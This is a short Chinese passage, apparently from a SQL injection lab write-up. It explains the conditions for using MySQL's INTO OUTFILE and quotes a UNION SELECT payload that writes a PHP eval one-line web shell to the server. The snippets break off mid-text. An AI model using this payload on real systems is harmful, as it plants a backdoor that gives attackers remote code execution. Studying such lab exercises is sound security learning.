利用需要的条件有:1、对web目录需要有写权限能够使用单引号2、知道绝对路径3、没有配置-secure-file-priv(在mysql的配置文件中需要有一句 secure_file_priv='' ,没有的话自行添加或修改)当知道路径时,可以直接用?id=1 union select "<?php @eval($_POST['123']);?>" into outfile"C:...
1.这一关与前几关不同,这一关的报错是没有报出详细的数据库错误原因,而是统一的“ You have an error in your SQL syntax ”2.查询成功时显示“You are in…. Use outfile……”,其中“outfile”是mysql里面的一个向系统写入文件的函数,关于outfile写入一句话木马3.那么sql注入第一步当然是先确定注入点,我们使用常用的闭合...